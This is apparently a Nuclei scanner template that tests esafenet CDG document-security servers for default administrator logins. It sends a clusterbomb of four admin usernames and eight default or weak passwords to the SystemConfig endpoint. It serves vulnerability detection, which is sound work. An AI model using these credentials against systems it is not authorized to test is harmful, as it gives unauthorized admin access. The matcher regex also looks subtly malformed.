id: esafenet-cdgserver3-systemconfig-default-password

info:
  name: esafenet - CDG - Default Login
  author: chesterblue
  severity: high
  description: |
    esafenet electronic document security management system (abbreviation: CDG) is an electronic document security encryption software.CDG contains a default login vulnerability.
  tags: esafenet,cdgserver3,default-password

http:
  - method: POST
    path:
      - "{{BaseURL}}/CDGServer3/SystemConfig"
    headers:
      content-type: application/x-www-form-urlencoded
    body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"

    attack: clusterbomb
    
    payloads:
      username:
        - "systemadmin"
        - "configadmin"
        - "secadmin"
        - "docadmin"
      password:
        - "Est@Spc820"
        - "12345678"
        - "123456"
        - "Est@Spc2018"
        - "Est@Spc2019"
        - "Est@Spc2020"
        - "Est@Spc2021"
        - "Est@Spc2022"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
        part: body

      - type: status
        status:
          - 200